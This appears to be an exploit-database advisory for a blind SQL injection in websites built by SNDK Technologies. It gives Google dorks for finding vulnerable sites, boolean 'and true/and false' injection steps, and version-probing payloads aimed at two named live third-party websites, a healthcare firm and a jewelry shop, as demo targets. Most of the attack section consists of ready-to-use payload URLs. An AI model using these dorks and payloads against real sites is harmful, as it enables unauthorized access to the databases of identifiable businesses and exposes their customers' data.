SNDK Technologies - Blind Sql Injection

2023.09.18

behrouz mansoori (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: "Designed by SNDK Technologies Pvt. Ltd."

*********************************************************
#Exploit Title: SNDK Technologies - Blind Sql Injection
#Date: 2023-09-16
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed by SNDK Technologies Pvt. Ltd."
#Category:webapps
#Tested On: Mac, Firefox
[+] search Dork : "Powered by CMS united"
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* https://www.vetoxhealthcare.com/category.php?id=4%27%20and%20true--+
* https://www.vetoxhealthcare.com/category.php?id=4%27%20and%20false--+
* https://www.vetoxhealthcare.com/category.php?id=4%27%20and%20substring(@@version,1,1)=5--+
### Demo 2:
* https://silverjewelryandgems.com/shop.php?id=1273%27%20and%20true--+
* https://silverjewelryandgems.com/shop.php?id=1273%27%20and%20false--+
* https://silverjewelryandgems.com/shop.php?id=1273%27%20and%20substring(@@version,1,1)=5--+
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

SNDK Technologies - Blind Sql Injection

Dork: "Designed by SNDK Technologies Pvt. Ltd."

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.